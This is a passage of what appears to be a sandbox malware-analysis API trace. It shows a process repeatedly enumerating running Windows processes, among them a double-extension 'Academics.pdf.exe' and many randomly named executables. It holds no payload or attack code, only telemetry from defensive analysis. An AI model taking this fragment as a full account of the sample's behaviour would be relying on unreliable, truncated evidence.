szExeFile="sppsvc.exe")) returned 1 [0300.268] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0300.269] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 1 [0300.269] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0300.270] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 0 [0300.271] CloseHandle (hObject=0x294) returned 1 [0300.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0300.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0300.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0300.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0300.271] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0300.271] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0300.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0300.271] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0300.271] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0300.271] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0300.271] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0300.271] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0300.273] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0300.274] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0300.274] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0300.275] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0300.275] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0300.276] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0300.277] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0300.277] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0300.278] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0300.279] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0300.279] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0300.280] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0300.280] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0300.281] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0300.282] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0300.282] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0300.283] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0300.284] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0300.285] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0300.286] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0300.286] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0300.287] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0300.287] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0300.288] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0300.289] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="advised-cleaners-junction.exe")) returned 1 [0300.289] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thy-transaction-css.exe")) returned 1 [0300.290] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="says_settlement.exe")) returned 1 [0300.291] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="katie.exe")) returned 1 [0300.291] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="choosing.exe")) returned 1 [0300.292] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pmc.exe")) returned 1 [0300.292] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sansruled.exe")) returned 1 [0300.293] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="platform.exe")) returned 1 [0300.294] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="student.exe")) returned 1 [0300.294] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="deployment.exe")) returned 1 [0300.295] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="close.exe")) returned 1 [0300.296] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reviewerbedrooms.exe")) returned 1 [0300.296] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_indigenous_neighborhood.exe")) returned 1 [0300.297] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ghana-after.exe")) returned 1 [0300.297] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="perfect tries.exe")) returned 1 [0300.298] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flexible.exe")) returned 1 [0300.299] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="secrets cas finding.exe")) returned 1 [0300.299] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="width cleared.exe")) returned 1 [0300.300] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0300.300] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x898, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0300.301] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0300.302] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0300.302] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 1 [0300.303] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0300.304] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 0 [0300.304] CloseHandle (hObject=0x294) returned 1 [0300.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0300.304] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0300.304] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0300.304] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0300.306] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0300.307] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0300.307] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0300.308] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0300.309] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0300.309] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0300.310] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0300.311] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0300.311] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0300.312] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0300.312] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0300.313] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0300.314] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0300.314] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0300.315] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0300.315] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0300.316] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0300.317] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0300.317] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0300.318] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0300.319] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0300.319] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0300.320] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0300.321] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0300.321] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, 